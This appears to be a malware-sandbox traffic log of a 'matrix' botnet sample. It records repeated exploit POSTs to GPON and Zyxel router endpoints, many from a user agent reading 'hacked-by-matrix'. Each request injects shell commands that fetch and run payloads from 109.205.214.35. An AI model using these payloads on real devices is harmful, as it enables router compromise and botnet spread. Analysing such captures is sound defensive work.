                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        690192.168.2.1338610212.7.26.242443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624058962 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        691192.168.2.1351534109.70.1.169443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624059916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        692192.168.2.13379265.109.53.39443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624085903 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        693192.168.2.1344200118.81.233.198443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624103069 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        694192.168.2.1356148212.61.226.167443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624120951 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        695192.168.2.1340796109.169.71.219443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624129057 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        696192.168.2.1352772109.193.85.162443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624144077 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        697192.168.2.1346154109.115.154.247443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624160051 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        698192.168.2.1355478118.104.222.5443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624169111 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        699192.168.2.13605705.227.125.15443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624178886 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        700192.168.2.1358694118.231.33.52443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624242067 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        701192.168.2.135302442.198.199.50443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624263048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        702192.168.2.13601605.52.192.6443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624270916 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        703192.168.2.1339354212.127.26.47443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:50.624298096 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        704192.168.2.1351398178.63.42.24880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:51.115530968 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:51.291385889 CET634INHTTP/1.1 301 Moved Permanently
                                                        Date: Thu, 21 Mar 2024 04:22:51 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Location: https://app.expert.withorca.com/cgi-bin/ViewLog.asp
                                                        Content-Length: 334
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 70 2e 65 78 70 65 72 74 2e 77 69 74 68 6f 72 63 61 2e 63 6f 6d 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://app.expert.withorca.com/cgi-bin/ViewLog.asp">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 127.0.0.1 Port 80</address></body></html>
                                                        Mar 21, 2024 05:22:51.291513920 CET509INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:51 GMT
                                                        Server: Apache/2.4.41 (Ubuntu)
                                                        Content-Length: 315
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 70 2e 65 78 70 65 72 74 2e 77 69 74 68 6f 72 63 61 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at app.expert.withorca.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        705192.168.2.1355986178.62.123.20380
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:51.273003101 CET435OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 127.0.0.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: hacked-by-matrix
                                                        Content-Length: 176
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 61 72 6d 37 3b 2e 2f 61 72 6d 37 20 7a 79 78 65 6c 3b 72 6d 2b 2d 72 66 2b 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a
                                                        Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://109.205.214.35/arm7;chmod+777+arm7;./arm7 zyxel;rm+-rf+arm7%3b%23&remoteSubmit=Save
                                                        Mar 21, 2024 05:22:51.445569038 CET814INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 03:40:23 GMT
                                                        Server: Apache/2.4.7 (Ubuntu)
                                                        Content-Length: 291
                                                        Keep-Alive: timeout=5, max=100
                                                        Connection: Keep-Alive
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 31 20 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 49 6d 70 6c 65 6d 65 6e 74 65 64 3c 2f 68 31 3e 0a 3c 70 3e 33 26 61 6d 70 3b 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 20 74 6f 20 2f 69 6e 64 65 78 2e 68 74 6d 6c 20 6e 6f 74 20 73 75 70 70 6f 72 74 65 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 6c 6f 63 61 6c 68 6f 73 74 20 